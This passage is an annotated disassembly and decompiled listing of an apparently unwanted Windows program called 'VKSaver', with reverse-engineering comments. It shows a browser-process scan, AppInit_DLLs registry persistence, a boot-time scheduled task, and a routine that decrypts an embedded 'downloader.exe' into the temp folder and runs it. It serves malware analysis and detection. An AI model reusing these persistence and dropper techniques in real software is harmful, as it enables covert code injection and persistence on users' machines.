; match; whether it is case-insensitive or a prefix compare is not visible here.
sub_401740() {
push ebp
mov ebp, esp
sub esp, 0x238
; /GS stack cookie setup; sub_406beb before ret is the matching cookie check.
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
mov ebx, [ebp+0x08]
push esi
push edi
push 0x00
push 0x02
mov esi, edx
mov edi, ecx
; [ebp-0x234] = match counter (returned in eax).
mov dword ptr [ebp-0x234], 0x00
call [kernel32.CreateToolhelp32Snapshot]
push 0x228
; [ebp-0x238] = snapshot handle; no INVALID_HANDLE_VALUE check before use.
mov [ebp-0x238], eax
lea eax, [ebp-0x22C]
push 0x00
push eax
call _memset()
add esp, 0x0C
lea eax, [ebp-0x230]
push eax
push [ebp-0x238]
; PROCESSENTRY32W.dwSize = 0x22C.
mov dword ptr [ebp-0x230], 0x22C
call [kernel32.Process32FirstW]
test eax, eax
jz .13
.1:
; szExeFile compared against each browser name; first hit selects the bit in eax.
lea eax, [ebp-0x20C]
push "iexplore.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .2
mov eax, 0x01
jmp .8
.2:
lea eax, [ebp-0x20C]
push "firefox.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .3
mov eax, 0x02
jmp .8
.3:
lea eax, [ebp-0x20C]
push "opera.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .4
mov eax, 0x04
jmp .8
.4:
lea eax, [ebp-0x20C]
push "chrome.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .5
mov eax, 0x08
jmp .8
.5:
lea eax, [ebp-0x20C]
push "safari.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .6
mov eax, 0x10
jmp .8
.6:
lea eax, [ebp-0x20C]
push "browser.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .7
mov eax, 0x20
jmp .8
.7:
lea eax, [ebp-0x20C]
push "maxthon.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
; No match at all: skip straight to the next process.
jnz .12
mov eax, 0x40
.8:
; Record the match: PID into the ecx array, bit into the edx array, OR into [ebp+8].
test edi, edi
jz .9
mov ecx, [ebp-0x228]
mov [edi], ecx
add edi, 0x04
.9:
test esi, esi
jz .10
mov [esi], al
inc esi
.10:
test ebx, ebx
jz .11
or [ebx], eax
.11:
inc [ebp-0x234]
.12:
lea eax, [ebp-0x230]
push eax
push [ebp-0x238]
call [kernel32.Process32NextW]
test eax, eax
jnz .1
.13:
push [ebp-0x238]
call [kernel32.CloseHandle]
mov ecx, [ebp-0x04]
; Return value: number of matches.
mov eax, [ebp-0x234]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/* Decompiled view of sub_401740 (see the asm listing above for the full picture).
 * Two things the decompiler lost: the function returns the match count in eax
 * (the asm reads it back from [ebp-0x234] before ret), and the snapshot handle
 * is never checked against INVALID_HANDLE_VALUE.
 * param_1: optional output array receiving the PID of each matching process.
 * param_2: optional output array receiving the browser bit (1..0x40) of each match.
 * param_3: optional accumulator OR-ed with each match's bit.
 * Neither output array is bounds-checked. auStack_210 is PROCESSENTRY32W.szExeFile,
 * uStack_22c is th32ProcessID. */
void __fastcall sub_401740(undefined4 *param_1,undefined *param_2,uint32_t *param_3)
{
undefined4 uVar1;
int32_t iVar2;
uint32_t uVar3;
undefined4 uStack_234;
undefined auStack_230 [4];
undefined4 uStack_22c;
undefined auStack_210 [520];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
/* 2 = TH32CS_SNAPPROCESS. */
uVar1 = (*kernel32.CreateToolhelp32Snapshot)(2, 0);
_memset(auStack_230, 0, 0x228);
/* PROCESSENTRY32W.dwSize. */
uStack_234 = 0x22c;
iVar2 = (*kernel32.Process32FirstW)(uVar1, &uStack_234);
do {
if (iVar2 == 0) {
(*kernel32.CloseHandle)(uVar1);
sub_406beb();
return;
}
/* sub_406ed0 returns 0 on a name match; the first matching name wins. */
iVar2 = sub_406ed0(auStack_210, "iexplore.exe");
if (iVar2 == 0) {
uVar3 = 1;
/* Shared "record a match" tail reached by goto from every other browser check. */
code_r0x0040188f:
if (param_1 != 0x0) {
*param_1 = uStack_22c;
param_1 = param_1 + 1;
}
if (param_2 != 0x0) {
*param_2 = uVar3;
param_2 = param_2 + 1;
}
if (param_3 != 0x0) {
*param_3 = *param_3 | uVar3;
}
}
else {
iVar2 = sub_406ed0(auStack_210, "firefox.exe");
if (iVar2 == 0) {
uVar3 = 2;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "opera.exe");
if (iVar2 == 0) {
uVar3 = 4;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "chrome.exe");
if (iVar2 == 0) {
uVar3 = 8;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "safari.exe");
if (iVar2 == 0) {
uVar3 = 0x10;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "browser.exe");
if (iVar2 == 0) {
uVar3 = 0x20;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "maxthon.exe");
if (iVar2 == 0) {
uVar3 = 0x40;
goto code_r0x0040188f;
}
}
iVar2 = (*kernel32.Process32NextW)(uVar1, &uStack_234);
} while( true );
}
0x402360 sub_402360 str 7 api 3 imm 12 Unknown
; sub_402360 -- persistence via the AppInit_DLLs mechanism.
; Opens HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
; (0x80000002 = HKEY_LOCAL_MACHINE, access 3 = KEY_QUERY_VALUE|KEY_SET_VALUE),
; reads AppInit_DLLs, rebuilds the list keeping every entry whose first 7
; characters are not "vksaver" (case-insensitive), appends the string at
; 0x4B1C10 (joined with the separator string at 0x46B250), writes the result
; back as REG_SZ (type 1), and sets LoadAppInit_DLLs to 1 (REG_DWORD, type 4)
; when it currently reads as 0. Finally re-reads AppInit_DLLs into the original
; buffer and passes it (in ecx) to sub_402280, whose purpose is not visible here.
; Returns al: 0 when the key cannot be opened, 1 otherwise -- including the path
; where RegSetValueExW fails (a nonzero result only skips the LoadAppInit_DLLs
; update; the function still reports success).
; Every DLL named in AppInit_DLLs is loaded into each process that loads
; user32.dll, so writes to this value are a high-signal event to monitor.
; Buffers: [ebp-0xA04] = 0x400-byte value read buffer, [ebp-0x604] = current
; list entry, [ebp-0x404] = 0x200-wchar output built with wcscat_s (bounded).
; sub_4022c0: ecx = input cursor, stack arg = output buffer; from the loop at
; .2/.6 it returns the cursor for the next entry, or 0 after the last one.
sub_402360() {
push ebp
mov ebp, esp
sub esp, 0xA10
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
lea eax, [ebp-0xA08]
push eax
push 0x03
push 0x00
push "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jz .1
; Open failed: return 0.
xor al, al
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.1:
push ebx
push esi
push 0x400
lea eax, [ebp-0xA04]
push 0x00
push eax
; [ebp-0xA0C] = cbData in/out for RegQueryValueExW.
mov dword ptr [ebp-0xA0C], 0x400
call _memset()
push 0x400
lea eax, [ebp-0x404]
push 0x00
push eax
call _memset()
mov ebx, [advapi32.RegQueryValueExW]
add esp, 0x18
lea eax, [ebp-0xA0C]
push eax
lea eax, [ebp-0xA04]
push eax
push 0x00
push 0x00
push "AppInit_DLLs"
push [ebp-0xA08]
call ebx
; Empty current value: nothing to filter, go straight to appending.
cmp word ptr [ebp-0xA04], 0x00
jz .7
push edi
lea edi, [ebp-0xA04]
.2:
; Next entry from the existing list into [ebp-0x604].
lea eax, [ebp-0x604]
push eax
mov ecx, edi
call sub_4022c0()
cmp word ptr [ebp-0x604], 0x00
mov edi, eax
lea esi, [ebp-0x604]
jz .4
.3:
; Drop the entry if "vksaver" occurs at any position (compare is re-run at each
; character offset, so this is effectively a case-insensitive substring test).
push 0x07
push "vksaver"
push esi
call __wcsnicmp()
add esp, 0x0C
test eax, eax
jz .6
add esi, 0x02
cmp word ptr [esi], 0x00
jnz .3
.4:
; Keep the entry: separator first if the output is non-empty, then the entry.
cmp word ptr [ebp-0x404], 0x00
jz .5
push 0x46B250
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
add esp, 0x0C
.5:
lea eax, [ebp-0x604]
push eax
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
add esp, 0x0C
.6:
test edi, edi
jnz .2
pop edi
.7:
; Append separator (if needed) and the new entry at 0x4B1C10.
cmp word ptr [ebp-0x404], 0x00
jz .8
push 0x46B250
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
add esp, 0x0C
.8:
push 0x4B1C10
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
lea ecx, [ebp-0x404]
add esp, 0x0C
lea edx, [ecx+0x02]
.9:
; Inline wcslen; eax = (len*2)+2 = byte size including the terminator.
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .9
mov esi, [advapi32.RegSetValueExW]
sub ecx, edx
sar ecx, 0x01
lea eax, [ecx*2+0x02]
push eax
mov [ebp-0xA0C], eax
lea eax, [ebp-0x404]
push eax
; type 1 = REG_SZ.
push 0x01
push 0x00
push "AppInit_DLLs"
push [ebp-0xA08]
call esi
test eax, eax
jz .10
; Write failed: close the key but still return 1.
push [ebp-0xA08]
call [advapi32.RegCloseKey]
pop esi
mov al, 0x01
pop ebx
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.10:
; Read LoadAppInit_DLLs (DWORD at [ebp-0xA10]); set it to 1 if it is 0.
lea eax, [ebp-0xA0C]
push eax
lea eax, [ebp-0xA10]
push eax
push 0x00
push 0x00
push "LoadAppInit_DLLs"
push [ebp-0xA08]
mov dword ptr [ebp-0xA10], 0x00
mov dword ptr [ebp-0xA0C], 0x04
call ebx
cmp dword ptr [ebp-0xA10], 0x00
jnz .11
push 0x04
lea eax, [ebp-0xA10]
push eax
; type 4 = REG_DWORD.
push 0x04
push 0x00
push "LoadAppInit_DLLs"
push [ebp-0xA08]
mov dword ptr [ebp-0xA10], 0x01
call esi
.11:
; Re-read AppInit_DLLs (cbData still holds 4 here, so only the first 4 bytes are
; requested; the result is not checked) and hand the buffer to sub_402280.
lea eax, [ebp-0xA0C]
push eax
lea eax, [ebp-0xA04]
push eax
push 0x00
push 0x00
push "AppInit_DLLs"
push [ebp-0xA08]
call ebx
push [ebp-0xA08]
call [advapi32.RegCloseKey]
lea ecx, [ebp-0xA04]
call sub_402280()
mov ecx, [ebp-0x04]
pop esi
xor ecx, ebp
mov al, 0x01
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/* Decompiled view of sub_402360 above: AppInit_DLLs persistence.
 * Rewrites HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
 * so that existing entries matching "vksaver" are removed and the string at
 * 0x4b1c10 is appended (separator at 0x46b250), then ensures LoadAppInit_DLLs = 1.
 * The decompiler shows void, but the asm returns al: 0 only when RegOpenKeyExW
 * fails, 1 otherwise -- even on the branch where RegSetValueExW fails.
 * aiStack_a08 = value read buffer (0x400 bytes); iStack_608 = current entry;
 * iStack_408 = output list (0x200 wide chars, wcscat_s-bounded). */
void sub_402360(void)
{
int16_t iVar1;
code *pcVar2;
code *pcVar3;
int32_t iVar4;
int32_t iVar5;
int16_t *piVar6;
int32_t iStack_a14;
int32_t iStack_a10;
undefined4 uStack_a0c;
int16_t aiStack_a08 [512];
int16_t iStack_608;
int16_t aiStack_606 [255];
int16_t iStack_408;
undefined auStack_406 [1022];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
/* 0x80000002 = HKEY_LOCAL_MACHINE; 3 = KEY_QUERY_VALUE | KEY_SET_VALUE. */
iVar4 = (*advapi32.RegOpenKeyExW)(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, 3, &uStack_a0c);
if (iVar4 != 0) {
sub_406beb();
return;
}
iStack_a10 = 0x400;
_memset(aiStack_a08, 0, 0x400);
_memset(&iStack_408, 0, 0x400);
pcVar2 = advapi32.RegQueryValueExW;
(*advapi32.RegQueryValueExW)(uStack_a0c, "AppInit_DLLs", 0, 0, aiStack_a08, &iStack_a10);
if (aiStack_a08[0] != 0) {
do {
/* sub_4022c0 yields the next entry in iStack_608 and returns 0 after the last one
 * (its cursor argument travels in ecx and is not shown by the decompiler). */
iVar4 = sub_4022c0(&iStack_608);
piVar6 = &iStack_608;
iVar1 = iStack_608;
/* Case-insensitive 7-char compare at every offset: drop entries containing "vksaver". */
while (iVar1 != 0) {
iVar5 = __wcsnicmp(piVar6, "vksaver", 7);
if (iVar5 == 0) goto code_r0x0040248c;
piVar6 = piVar6 + 1;
iVar1 = *piVar6;
}
if (iStack_408 != 0) {
_wcscat_s(&iStack_408, 0x200, 0x46b250);
}
_wcscat_s(&iStack_408, 0x200, &iStack_608);
code_r0x0040248c:
} while (iVar4 != 0);
}
/* Append the new entry (string at 0x4b1c10), separator first if needed. */
if (iStack_408 != 0) {
_wcscat_s(&iStack_408, 0x200, 0x46b250);
}
_wcscat_s(&iStack_408, 0x200, 0x4b1c10);
pcVar3 = advapi32.RegSetValueExW;
piVar6 = &iStack_408;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
/* Byte length of the new value including the NUL terminator. */
iStack_a10 = (piVar6 - auStack_406 >> 1) * 2 + 2;
/* type 1 = REG_SZ. */
iVar4 = (*advapi32.RegSetValueExW)(uStack_a0c, "AppInit_DLLs", 0, 1, &iStack_408, iStack_a10);
if (iVar4 != 0) {
/* Write failed; the asm still sets al = 1 on this path. */
(*advapi32.RegCloseKey)(uStack_a0c);
sub_406beb();
return;
}
/* Force LoadAppInit_DLLs = 1 (REG_DWORD, type 4) when it is currently 0. */
iStack_a14 = 0;
iStack_a10 = 4;
(*pcVar2)(uStack_a0c, "LoadAppInit_DLLs", 0, 0, &iStack_a14, &iStack_a10);
if (iStack_a14 == 0) {
iStack_a14 = 1;
(*pcVar3)(uStack_a0c, "LoadAppInit_DLLs", 0, 4, &iStack_a14, 4);
}
/* Re-read with iStack_a10 still 4, so at most 4 bytes land in aiStack_a08; result unchecked.
 * sub_402280 receives aiStack_a08 in ecx (argument not shown); its purpose is not visible here. */
(*pcVar2)(uStack_a0c, "AppInit_DLLs", 0, 0, aiStack_a08, &iStack_a10);
(*advapi32.RegCloseKey)(uStack_a0c);
sub_402280();
sub_406beb();
return;
}
0x401960 sub_401960 str 4 api 3 imm 9 Unknown
; sub_401960 -- persistence through the legacy Task Scheduler 1.0 COM API
; (ITaskScheduler / ITask / ITaskTrigger / IPersistFile; CLSID/IID data is
; copied from 0x46AD28..0x46AD70 onto the stack below).
; Deletes the work items "VKSaver" and "VKSaverUpdate", creates a new
; "VKSaverUpdate" work item with a system-start trigger, application path from
; the string at 0x4B1A10, parameters "-autoupdate", account string at 0x46B100
; with a NULL password, and persists it through IPersistFile::Save.
; Input: cl (kept in bl) -- nonzero also runs the new task immediately.
; Returns al = 1 on success, 0 when any interface pointer comes back NULL.
; Vtable slot offsets are consistent with mstask.h; the method names in the
; comments are inferred from the slots (no type info in the listing).
; Review notes: the failure path at .1 returns without CoUninitialize and
; without releasing interfaces obtained so far; no HRESULT is ever checked.
sub_401960() {
push ebp
mov ebp, esp
sub esp, 0x9C
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push 0x00
push 0x00
mov bl, cl
; Interface pointer slots zeroed: [ebp-0x8C] scheduler, [ebp-0x88] task,
; [ebp-0x94] IPersistFile, [ebp-0x90] trigger.
mov dword ptr [ebp-0x8C], 0x00
mov dword ptr [ebp-0x88], 0x00
mov dword ptr [ebp-0x94], 0x00
mov dword ptr [ebp-0x90], 0x00
; CoInitializeEx(NULL, 0) -- 0 = COINIT_MULTITHREADED.
call [ole32.CoInitializeEx]
; 16-byte GUIDs copied to the stack: [ebp-0x14] IID for CoCreateInstance,
; [ebp-0x24] CLSID for CoCreateInstance, [ebp-0x44]/[ebp-0x54] IID/CLSID for
; NewWorkItem, [ebp-0x34] IID_IPersistFile.
movq xmm0, qword ptr [0x46AD38]
movq [ebp-0x14], xmm0
movq xmm0, qword ptr [0x46AD40]
movq [ebp-0x0C], xmm0
movq xmm0, qword ptr [0x46AD28]
movq [ebp-0x24], xmm0
movq xmm0, qword ptr [0x46AD30]
movq [ebp-0x1C], xmm0
movq xmm0, qword ptr [0x46AD68]
movq [ebp-0x44], xmm0
movq xmm0, qword ptr [0x46AD70]
movq [ebp-0x3C], xmm0
movq xmm0, qword ptr [0x46AD58]
lea eax, [ebp-0x8C]
push eax
movq [ebp-0x54], xmm0
movq xmm0, qword ptr [0x46AD60]
lea eax, [ebp-0x14]
push eax
movq [ebp-0x4C], xmm0
movq xmm0, qword ptr [IPersistFile]
; CoCreateInstance(&clsid, NULL, 1 = CLSCTX_INPROC_SERVER, &iid, &[ebp-0x8C]).
push 0x01
movq [ebp-0x34], xmm0
movq xmm0, qword ptr [0x46AD50]
push 0x00
lea eax, [ebp-0x24]
push eax
movq [ebp-0x2C], xmm0
call [ole32.CoCreateInstance]
mov ecx, [ebp-0x8C]
test ecx, ecx
jnz .2
.1:
; Common failure exit: al = 0, COM left initialised.
xor al, al
pop ebx
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.2:
; slot 0x1C: ITaskScheduler::Delete("VKSaver"), then Delete("VKSaverUpdate").
mov eax, [ecx]
push "VKSaver"
push ecx
call [eax+0x1C]
mov eax, [ebp-0x8C]
push "VKSaverUpdate"
mov ecx, [eax]
push eax
call [ecx+0x1C]
; slot 0x20: ITaskScheduler::NewWorkItem("VKSaverUpdate", &clsid[ebp-0x54],
; &iid[ebp-0x44], &[ebp-0x88]).
mov eax, [ebp-0x8C]
lea edx, [ebp-0x88]
mov ecx, [eax]
push edx
lea edx, [ebp-0x44]
push edx
lea edx, [ebp-0x54]
push edx
push "VKSaverUpdate"
push eax
call [ecx+0x20]
mov ecx, [ebp-0x88]
test ecx, ecx
jz .1
; slot 0x0C: IScheduledWorkItem::CreateTrigger(&index[ebp-0x98], &trigger[ebp-0x90]).
mov eax, [ecx]
lea edx, [ebp-0x90]
push edx
lea edx, [ebp-0x98]
push edx
push ecx
call [eax+0x0C]
; TASK_TRIGGER at [ebp-0x84], zeroed then filled: cbTriggerSize = 0x30,
; +4 = 0x107D0 -> wBeginYear 2000 / wBeginMonth 1, +8 wBeginDay = 1,
; +0x14 MinutesDuration = 0xFFFF, +0x20 TriggerType = 6, which is
; TASK_EVENT_TRIGGER_AT_SYSTEMSTART (runs at boot).
push 0x30
lea eax, [ebp-0x84]
push 0x00
push eax
call _memset()
mov eax, 0x30
mov [ebp-0x84], ax
mov eax, 0x01
add esp, 0x0C
mov [ebp-0x7C], ax
mov eax, [ebp-0x90]
lea edx, [ebp-0x84]
mov dword ptr [ebp-0x80], 0x107D0
mov dword ptr [ebp-0x70], 0xFFFF
mov dword ptr [ebp-0x64], 0x06
mov ecx, [eax]
push edx
push eax
; slot 0x0C: ITaskTrigger::SetTrigger(&[ebp-0x84]).
call [ecx+0x0C]
; slot 0x80: ITask::SetApplicationName(string at 0x4B1A10).
mov eax, [ebp-0x88]
push 0x4B1A10
mov ecx, [eax]
push eax
call [ecx+0x80]
; slot 0x78: IScheduledWorkItem::SetAccountInformation(string at 0x46B100, NULL password).
mov eax, [ebp-0x88]
push 0x00
mov ecx, [eax]
push 0x46B100
push eax
call [ecx+0x78]
; slot 0x88: ITask::SetParameters("-autoupdate").
mov eax, [ebp-0x88]
push "-autoupdate"
mov ecx, [eax]
push eax
call [ecx+0x88]
; slot 0: QueryInterface(IID_IPersistFile) -> [ebp-0x94].
mov eax, [ebp-0x88]
lea edx, [ebp-0x94]
mov ecx, [eax]
push edx
lea edx, [ebp-0x34]
push edx
push eax
call [ecx]
mov ecx, [ebp-0x94]
test ecx, ecx
jz .1
; slot 0x18: IPersistFile::Save(NULL, TRUE) writes the .job file; then Release.
mov eax, [ecx]
push 0x01
push 0x00
push ecx
call [eax+0x18]
mov eax, [ebp-0x94]
push eax
mov ecx, [eax]
call [ecx+0x08]
; Optional immediate start: slot 0x30 = IScheduledWorkItem::Run when the input flag is set.
test bl, bl
jz .4
mov eax, [ebp-0x88]
push eax
mov ecx, [eax]
call [ecx+0x30]
.4:
; Release task, trigger and scheduler; success exit al = 1.
mov eax, [ebp-0x88]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov eax, [ebp-0x90]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov eax, [ebp-0x8C]
push eax
mov ecx, [eax]
call [ecx+0x08]
call [ole32.CoUninitialize]
mov ecx, [ebp-0x04]
xor ecx, ebp
mov al, 0x01
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
/* DISPLAY WARNING: Type casts are NOT being printed */
/* Decompiled view of sub_401960 above: Task Scheduler 1.0 persistence.
 * Creates the work item "VKSaverUpdate" (after deleting "VKSaver" and
 * "VKSaverUpdate") with a system-start trigger, application path at 0x4b1a10,
 * parameters "-autoupdate", account string at 0x46b100 / NULL password, and
 * saves it via IPersistFile. param_1 != 0 also runs the task immediately.
 * The decompiler shows void, but the asm returns al = 1 on success and 0 on
 * any NULL interface pointer (the early-exit path below, which also skips
 * CoUninitialize and all Release calls).
 * Slot-to-method mapping is inferred from mstask.h offsets; no type info here. */
void __fastcall sub_401960(char param_1)
{
undefined auStack_9c [4];
int32_t *piStack_98;
int32_t *piStack_94;
int32_t *piStack_90;
int32_t *piStack_8c;
undefined2 auStack_88 [2];
undefined4 uStack_84;
undefined2 uStack_80;
undefined4 uStack_74;
undefined4 uStack_68;
undefined8 uStack_58;
undefined8 uStack_50;
undefined8 uStack_48;
undefined8 uStack_40;
undefined8 uStack_38;
undefined8 uStack_30;
undefined8 uStack_28;
undefined8 uStack_20;
undefined8 uStack_18;
undefined8 uStack_10;
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
piStack_90 = 0x0;
piStack_8c = 0x0;
piStack_98 = 0x0;
piStack_94 = 0x0;
/* 0 = COINIT_MULTITHREADED. */
(*ole32.CoInitializeEx)(0, 0);
/* GUIDs from the data section: uStack_18 = IID, uStack_28 = CLSID for CoCreateInstance;
 * uStack_48 / uStack_58 = IID / CLSID for NewWorkItem; uStack_38 = IID_IPersistFile. */
uStack_18 = [0x0x46ad38];
uStack_10 = [0x0x46ad40];
uStack_28 = [0x0x46ad28];
uStack_20 = [0x0x46ad30];
uStack_48 = [0x0x46ad68];
uStack_40 = [0x0x46ad70];
uStack_58 = [0x0x46ad58];
uStack_50 = [0x0x46ad60];
uStack_38 = IPersistFile;
uStack_30 = [0x0x46ad50];
/* 1 = CLSCTX_INPROC_SERVER; piStack_90 receives the ITaskScheduler pointer. */
(*ole32.CoCreateInstance)(&uStack_28, 0, 1, &uStack_18, &piStack_90);
if (piStack_90 != 0x0) {
/* slot 0x1c: ITaskScheduler::Delete; slot 0x20: NewWorkItem -> piStack_8c (ITask). */
(**(*piStack_90 + 0x1c))(piStack_90, "VKSaver");
(**(*piStack_90 + 0x1c))(piStack_90, "VKSaverUpdate");
(**(*piStack_90 + 0x20))(piStack_90, "VKSaverUpdate", &uStack_58, &uStack_48, &piStack_8c);
if (piStack_8c != 0x0) {
/* slot 0xc: IScheduledWorkItem::CreateTrigger(&index, &ITaskTrigger) -> piStack_94. */
(**(*piStack_8c + 0xc))(piStack_8c, auStack_9c, &piStack_94);
/* TASK_TRIGGER (0x30 bytes): cbTriggerSize 0x30, begin date 2000-01-01,
 * MinutesDuration 0xffff, TriggerType 6 = TASK_EVENT_TRIGGER_AT_SYSTEMSTART. */
_memset(auStack_88, 0, 0x30);
auStack_88[0] = 0x30;
uStack_80 = 1;
uStack_84 = 0x107d0;
uStack_74 = 0xffff;
uStack_68 = 6;
/* slot 0xc on ITaskTrigger: SetTrigger. */
(**(*piStack_94 + 0xc))(piStack_94, auStack_88);
/* ITask slots: 0x80 SetApplicationName(path at 0x4b1a10), 0x78 SetAccountInformation
 * (account string at 0x46b100, NULL password), 0x88 SetParameters("-autoupdate"). */
(**(*piStack_8c + 0x80))(piStack_8c, 0x4b1a10);
(**(*piStack_8c + 0x78))(piStack_8c, 0x46b100, 0);
(**(*piStack_8c + 0x88))(piStack_8c, "-autoupdate");
/* QueryInterface(IID_IPersistFile) -> piStack_98. */
(***piStack_8c)(piStack_8c, &uStack_38, &piStack_98);
if (piStack_98 != 0x0) {
/* slot 0x18: IPersistFile::Save(NULL, TRUE), then Release. */
(**(*piStack_98 + 0x18))(piStack_98, 0, 1);
(**(*piStack_98 + 8))(piStack_98);
/* slot 0x30: IScheduledWorkItem::Run, only when the caller asked for an immediate start. */
if (param_1 != '\0') {
(**(*piStack_8c + 0x30))(piStack_8c);
}
(**(*piStack_8c + 8))(piStack_8c);
(**(*piStack_94 + 8))(piStack_94);
(**(*piStack_90 + 8))(piStack_90);
(*ole32.CoUninitialize)();
sub_406beb();
return;
}
}
}
/* Failure exit (al = 0 in the asm): no CoUninitialize, nothing released. */
sub_406beb();
return;
}
0x404A80 sub_404a80 str 3 api 16 imm 30 Unknown
sub_404a80() {
push ebp
mov ebp, esp
and esp, 0xFFFFFFF0
mov eax, 0x1078
call __alloca_probe()
mov eax, [0x46F000]
xor eax, esp
mov [esp+0x1074], eax
push esi
push edi
push 0x44
lea eax, [esp+0x34]
xorps xmm0, xmm0
push 0x00
push eax
movdqa [esp+0x1C], xmm0
call _memset()
add esp, 0x0C
cmp word ptr [0x4B1048], 0x00
jz .9
lea eax, [esp+0x78]
push eax
push 0x200
call [kernel32.GetTempPathW]
lea ecx, [esp+0x78]
lea edx, [ecx+0x02]
nop
.1:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .1
sub ecx, edx
sar ecx, 0x01
lea esi, [esp+0x78]
cmp word ptr [esi+ecx*2-0x02], 0x5C
lea esi, [esi+ecx*2]
jz .2
mov eax, 0x5C
mov [esi], ax
add esi, 0x02
.2:
lea eax, [esp+0x28]
push eax
call [kernel32.GetSystemTimeAsFileTime]
call [kernel32.GetCurrentProcessId]
rol eax, 0x18
xor eax, [esp+0x2C]
push eax
call [kernel32.GetTickCount]
xor eax, [esp+0x2C]
push eax
push "%x%x"
push esi
call [user32.wsprintfW]
add esp, 0x10
xor ecx, ecx
mov edi, edi
.3:
movzx eax, word ptr [esp+ecx*1+0x78]
mov [esp+ecx*1+0x478], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .3
push 0x00
lea eax, [esp+0x47C]
push eax
call [kernel32.CreateDirectoryW]
lea edi, [esp+0x78]
add edi, 0xFFFFFFFE
lea esp, [esp]
.4:
mov ax, [edi+0x02]
add edi, 0x02
test ax, ax
jnz .4
push 0x23984
mov ecx, 0x08
mov esi, "\\downloader.exe"
push 0x01
rep movsd
call _calloc()
mov esi, eax
add esp, 0x08
mov [esp+0x0C], esi
test esi, esi
jz .6
mov eax, esi
mov edx, 0x4146B0
sub eax, edx
mov ecx, 0x75BCD15
mov [esp+0x08], eax
mov edi, 0x8E60
mov esi, eax
lea ebx, [ebx]
.5:
mov eax, [edx]
xor eax, ecx
rol ecx, 0x0D
mov [esi+edx*1], eax
lea edx, [edx+0x04]
dec edi
jnz .5
mov esi, [esp+0x0C]
.6:
push 0x23980
mov edx, esi
lea ecx, [esp+0x7C]
mov dword ptr [esp+0x0C], 0x23980
call sub_401650()
add esp, 0x04
cmp al, 0x01
jz .7
lea ecx, [esp+0x78]
call sub_401510()
test al, al
jz .8
push 0x00
push 0x00
push 0x02
push 0x00
push 0x01
push 0x40000000
lea eax, [esp+0x90]
push eax
call [kernel32.CreateFileW]
mov edi, eax
cmp edi, 0xFFFFFFFF
jz .8
push 0x00
lea eax, [esp+0x0C]
push eax
push [esp+0x10]
push esi
push edi
call [kernel32.WriteFile]
push edi
call [kernel32.CloseHandle]
.7:
xor eax, eax
mov [esp+0x60], ax
push 0x4B1048
lea eax, [esp+0x7C]
push eax
lea eax, [esp+0x880]
push "\"%s\" %s"
push eax
mov dword ptr [esp+0x40], 0x44
mov dword ptr [esp+0x6C], 0x01
call [user32.wsprintfW]
add esp, 0x10
lea eax, [esp+0x10]
push eax
lea eax, [esp+0x34]
push eax
lea eax, [esp+0x480]
push eax
push 0x00
push 0x8000000
push 0x00
push 0x00
push 0x00
lea eax, [esp+0x898]
push eax
push 0x00
call [kernel32.CreateProcessW]
.8:
push esi
call _free()
add esp, 0x04
.9:
mov dl, 0x01
mov cl, dl
call sub_402ce0()
mov esi, [esp+0x10]
cmp esi, 0xFFFFFFFF
jz .15
test esi, esi
jz .15
push 0xEA60
push esi
mov byte ptr [0x4B14B8], 0x01
call [kernel32.WaitForSingleObject]
mov edi, [kernel32.Sleep]
test eax, eax
jz .10
push 0x01
push [0x4B1480]
call [user32.EnableWindow]
push 0x493E0
push esi
call [kernel32.WaitForSingleObject]
test eax, eax
jnz .12
.10:
mov ecx, [esp+0x18]
call sub_404910()
test al, al
jz .12
mov byte ptr [0x4B14B8], 0x02
xor esi, esi
